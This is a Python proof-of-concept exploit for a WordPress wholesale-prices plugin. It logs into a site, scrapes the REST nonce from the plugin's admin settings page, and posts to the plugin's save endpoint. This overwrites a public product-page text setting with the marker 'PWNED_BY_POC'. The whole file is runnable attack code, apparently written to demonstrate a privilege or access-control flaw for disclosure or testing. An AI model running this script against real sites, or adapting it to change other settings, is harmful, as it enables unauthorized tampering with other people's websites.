import re
import sys
import json
import argparse
import requests
from urllib.parse import urljoin
def wp_login(session, base_url, username, password):
    """Authenticate *session* against the WordPress login form.

    Fetches ``/wp-login.php``, posts the credentials, and exits the process
    with status 1 on any failure: the login page is not HTTP 200, the post
    does not end up on a URL containing ``wp-admin``, or the session jar has
    no cookie whose name contains ``wordpress_logged_in``. Progress is
    reported on stdout with the script's ``[+]``/``[-]`` markers.

    Args:
        session: HTTP session object providing ``get``, ``post`` and
            ``cookies.get_dict()``.
        base_url: Site root the login URL is resolved against.
        username: Account name sent in the ``log`` form field.
        password: Account password sent in the ``pwd`` form field.
    """
    login_url = urljoin(base_url, "/wp-login.php")

    page = session.get(login_url, timeout=20)
    if page.status_code != 200:
        print("[-] Failed to load login page")
        sys.exit(1)

    form = {
        "log": username,
        "pwd": password,
        "wp-submit": "Log In",
        "redirect_to": urljoin(base_url, "/wp-admin/"),
        "testcookie": "1",
    }
    result = session.post(login_url, data=form, timeout=20, allow_redirects=True)

    # Success is judged by where the redirect chain landed, not by status code.
    landed_in_admin = "wp-admin" in result.url
    if not landed_in_admin:
        print("[-] Login failed")
        sys.exit(1)
    print("[+] Logged in successfully")

    # The cookie name is matched by substring, so any suffix is accepted.
    cookie_names = session.cookies.get_dict().keys()
    has_auth_cookie = any("wordpress_logged_in" in name for name in cookie_names)
    if not has_auth_cookie:
        print("[-] Missing wordpress_logged_in cookie")
        sys.exit(1)
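def extract_nonce_and_rest(html):
    """Pull the REST nonce and REST root URL out of a wp-admin page source.

    Preferred path: parse the inline ``wpApiSettings = {...}`` object and
    return its ``nonce`` and ``root`` fields. Fallback path: scan for raw
    ``"nonce":"<hex>"`` and ``"root":"..."`` JSON fragments and return the
    first nonce candidate plus the JSON-decoded root (so ``\\/`` escapes are
    resolved). Exits with status 1 when neither path yields both values.

    Args:
        html: Page source as text.

    Returns:
        A ``(nonce, rest_root)`` tuple of strings.
    """
    match = re.search(r'wpApiSettings\s*=\s*(\{.*?\})', html)
    if match:
        try:
            data = json.loads(match.group(1))
        except ValueError:
            # Not valid JSON (e.g. the non-greedy match cut a nested object
            # short); only decode errors are swallowed, everything else
            # surfaces. Fall through to the regex scan below.
            data = None
        if isinstance(data, dict) and "nonce" in data and "root" in data:
            print("[+] Using wpApiSettings nonce")
            return data["nonce"], data["root"]

    print("[!] wpApiSettings not found, fallback mode")
    nonce_candidates = re.findall(r'"nonce":"([a-f0-9]+)"', html)
    rest_match = re.search(r'"root":"([^"]+)"', html)
    if not nonce_candidates or not rest_match:
        print("[-] Failed to extract nonce or REST root")
        sys.exit(1)

    # Re-quote the captured value so json.loads resolves JSON string escapes.
    rest_root = json.loads(f'"{rest_match.group(1)}"')
    print(f"[!] Found {len(nonce_candidates)} nonce candidates")
    return nonce_candidates[0], rest_root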
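def main():
    """Command-line entry point for the PoC.

    Parses ``--base-url``, ``--username``, ``--password`` and ``--debug``,
    logs in with the supplied account, loads the plugin's wholesale-prices
    settings page, extracts the REST nonce and root from it, and posts the
    settings payload to the ``wwp/v1/admin/save`` endpoint. The outcome is
    reported on stdout; any failed step exits with status 1.
    """
    parser = argparse.ArgumentParser()
    parser.add_argument("--base-url", required=True)
    parser.add_argument("--username", required=True)
    parser.add_argument("--password", required=True)
    parser.add_argument("--debug", action="store_true")
    args = parser.parse_args()

    base_url = args.base_url.strip().rstrip("/")
    # Require a full scheme; a bare "http" prefix check would also accept
    # values such as "httpfoo".
    if not base_url.startswith(("http://", "https://")):
        print("[-] Invalid base URL")
        sys.exit(1)

    session = requests.Session()
    print(f"[+] Base URL: {base_url}")
    print(f"[+] Username: {args.username}")
    wp_login(session, base_url, args.username, args.password)

    admin_url = urljoin(
        base_url,
        "/wp-admin/admin.php?page=wholesale-settings&tab=wholesale_prices"
    )
    r = session.get(admin_url, timeout=20)
    if r.status_code != 200:
        print("[-] Failed to access admin page")
        sys.exit(1)
    print(f"[+] Accessed admin page: {admin_url}")

    # Both values are scraped from the settings page markup.
    nonce, rest_root = extract_nonce_and_rest(r.text)
    print(f"[+] Nonce: {nonce}")
    print(f"[+] REST root: {rest_root}")

    payload = [
        {
            "key": "wwp_see_wholesale_prices_replacement_text",
            "value": "PWNED_BY_POC"
        }
    ]
    target = urljoin(rest_root, "wwp/v1/admin/save")
    headers = {
        "X-WP-Nonce": nonce,
        "Content-Type": "application/json",
        "Referer": admin_url,
        "Origin": base_url,
        "User-Agent": "Mozilla/5.0 (PoC)"
    }
    print(f"[+] Sending payload to: {target}")
    r = session.post(
        target,
        json=payload,
        headers=headers,
        timeout=20
    )
    print(f"[+] HTTP status: {r.status_code}")
    print(r.text)

    # Only the HTTP status decides the verdict; the body is printed above
    # for manual inspection.
    if r.status_code == 200:
        print("[+] PoC SUCCESS (pwnd)")
        print("[*] Verify via incognito (not logged in):")
        print(" - Open product page")
        print(" - Look for: PWNED_BY_POC")
    else:
        print("[-] PoC failed")

    if args.debug:
        # This dumps the authenticated session cookies to stdout.
        print("[DEBUG] Cookies:", session.cookies.get_dict())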
# Run the PoC only when executed as a script, not when imported.
if __name__ == "__main__":
    main()